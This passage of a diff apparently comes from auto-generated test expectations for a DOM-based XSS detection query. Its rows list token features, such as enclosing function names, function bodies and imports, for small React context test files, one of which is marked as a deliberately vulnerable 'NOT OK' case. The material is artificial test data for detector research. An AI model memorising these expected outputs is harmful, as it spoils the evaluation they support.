./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:46:4:53 | document | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:46:4:53 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:46:4:53 | document | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:46:4:53 | document | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:46:4:53 | document | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:46:4:58 | document.body | assignedToPropName | root | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:46:4:58 | document.body | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:46:4:58 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:46:4:58 | document.body | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:46:4:58 | document.body | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:46:4:58 | document.body | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:55:4:58 | body | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:55:4:58 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:55:4:58 | body | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:55:4:58 | body | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:55:4:58 | body | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:0 | this | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:0 | this | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:1 | MyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:1 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:1 | MyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:1 | useContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:1 | useContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:1 | useContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:1 | useMyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:1 | useMyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:1 | useMyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:46 | import ... react'; | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:46 | import ... react'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:1:1:46 | import ... react'; | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:10:1:19 | useContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:10:1:19 | useContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:10:1:19 | useContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:10:1:19 | useContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:10:1:19 | useContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:10:1:19 | useContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:10:1:19 | useContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:10:1:19 | useContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:10:1:19 | useContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:10:1:19 | useContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:10:1:19 | useContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:10:1:19 | useContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:10:1:19 | useContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:22:1:30 | Component | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:22:1:30 | Component | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:22:1:30 | Component | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:22:1:30 | Component | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:22:1:30 | Component | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:22:1:30 | Component | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:22:1:30 | Component | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:22:1:30 | Component | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:22:1:30 | Component | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:22:1:30 | Component | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:22:1:30 | Component | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:22:1:30 | Component | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:39:1:45 | 'react' | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:39:1:45 | 'react' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:1:39:1:45 | 'react' | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:1:2:51 | import ... ntext'; | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:1:2:51 | import ... ntext'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:1:2:51 | import ... ntext'; | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:10:2:18 | MyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:10:2:18 | MyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:10:2:18 | MyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:10:2:18 | MyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:10:2:18 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:10:2:18 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:10:2:18 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:10:2:18 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:10:2:18 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:10:2:18 | MyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:10:2:18 | MyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:10:2:18 | MyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:10:2:18 | MyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:27:2:50 | './reac ... ontext' | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:27:2:50 | './reac ... ontext' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:2:27:2:50 | './reac ... ontext' | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | MyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | MyContext | enclosingFunctionBody | useContext MyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | MyContext | enclosingFunctionName | useMyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | MyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | this | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | this | enclosingFunctionBody | useContext MyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | this | enclosingFunctionName | useMyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | this | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | useContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | useContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | useContext | enclosingFunctionBody | useContext MyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | useContext | enclosingFunctionName | useMyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:4:0 | useContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | 'arguments' object of function useMyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | 'arguments' object of function useMyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | 'arguments' object of function useMyContext | enclosingFunctionBody | useContext MyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | 'arguments' object of function useMyContext | enclosingFunctionName | useMyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | 'arguments' object of function useMyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | exceptional return of function useMyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | exceptional return of function useMyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | exceptional return of function useMyContext | enclosingFunctionBody | useContext MyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | exceptional return of function useMyContext | enclosingFunctionName | useMyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | exceptional return of function useMyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | functio ... ext);\\n} | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | functio ... ext);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | functio ... ext);\\n} | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | return of function useMyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | return of function useMyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | return of function useMyContext | enclosingFunctionBody | useContext MyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | return of function useMyContext | enclosingFunctionName | useMyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:1:6:1 | return of function useMyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:10:4:21 | useMyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:10:4:21 | useMyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:10:4:21 | useMyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:10:4:21 | useMyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:10:4:21 | useMyContext | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:10:4:21 | useMyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:4:10:4:21 | useMyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:21 | useContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:21 | useContext | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:21 | useContext | enclosingFunctionBody | useContext MyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:21 | useContext | enclosingFunctionName | useMyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:21 | useContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:32 | exceptional return of useCont ... ontext) | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:32 | exceptional return of useCont ... ontext) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:32 | exceptional return of useCont ... ontext) | enclosingFunctionBody | useContext MyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:32 | exceptional return of useCont ... ontext) | enclosingFunctionName | useMyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:32 | exceptional return of useCont ... ontext) | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:32 | useCont ... ontext) | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:32 | useCont ... ontext) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:32 | useCont ... ontext) | enclosingFunctionBody | useContext MyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:32 | useCont ... ontext) | enclosingFunctionName | useMyContext | +| autogenerated/Xss/DomBasedXss/react-use-context.js:5:12:5:32 | useCont ... ontext) | fileImports | ./react-create-context react | | autogenerated/Xss/DomBasedXss/react-use-context.js:5:23:5:31 | MyContext | CalleeFlexibleAccessPath | useContext | | autogenerated/Xss/DomBasedXss/react-use-context.js:5:23:5:31 | MyContext | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-use-context.js:5:23:5:31 | MyContext | calleeImports | react | @@ -14604,6 +106094,117 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-use-context.js:5:23:5:31 | MyContext | enclosingFunctionBody | useContext MyContext | | autogenerated/Xss/DomBasedXss/react-use-context.js:5:23:5:31 | MyContext | enclosingFunctionName | useMyContext | | autogenerated/Xss/DomBasedXss/react-use-context.js:5:23:5:31 | MyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:8:7 | this | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:8:7 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:8:7 | this | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:8:7 | this | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:8:7 | this | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:8:7 | useMyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:8:7 | useMyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:8:7 | useMyContext | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:8:7 | useMyContext | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:8:7 | useMyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | 'arguments' object of function useDoc1 | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | 'arguments' object of function useDoc1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | 'arguments' object of function useDoc1 | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | 'arguments' object of function useDoc1 | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | 'arguments' object of function useDoc1 | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | exceptional return of function useDoc1 | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | exceptional return of function useDoc1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | exceptional return of function useDoc1 | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | exceptional return of function useDoc1 | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | exceptional return of function useDoc1 | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | functio ... OT OK\\n} | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | functio ... OT OK\\n} | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | return of function useDoc1 | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | return of function useDoc1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | return of function useDoc1 | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | return of function useDoc1 | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:8:11:1 | return of function useDoc1 | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:17:8:23 | useDoc1 | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:17:8:23 | useDoc1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:8:17:8:23 | useDoc1 | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:16 | { root } | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:16 | { root } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:16 | { root } | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:16 | { root } | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:16 | { root } | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:33 | root | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:33 | root | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:33 | root | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:33 | root | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:33 | root | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:33 | { root ... ntext() | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:33 | { root ... ntext() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:33 | { root ... ntext() | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:33 | { root ... ntext() | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:9:9:33 | { root ... ntext() | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:11:9:14 | root | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:31 | useMyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:31 | useMyContext | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:31 | useMyContext | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:31 | useMyContext | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:31 | useMyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:33 | exceptional return of useMyContext() | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:33 | exceptional return of useMyContext() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:33 | exceptional return of useMyContext() | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:33 | exceptional return of useMyContext() | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:33 | exceptional return of useMyContext() | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:33 | useMyContext() | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:33 | useMyContext() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:33 | useMyContext() | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:33 | useMyContext() | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:9:20:9:33 | useMyContext() | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:8 | root | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:8 | root | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:8 | root | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:8 | root | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:8 | root | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:20 | root.appendChild | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:20 | root.appendChild | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:20 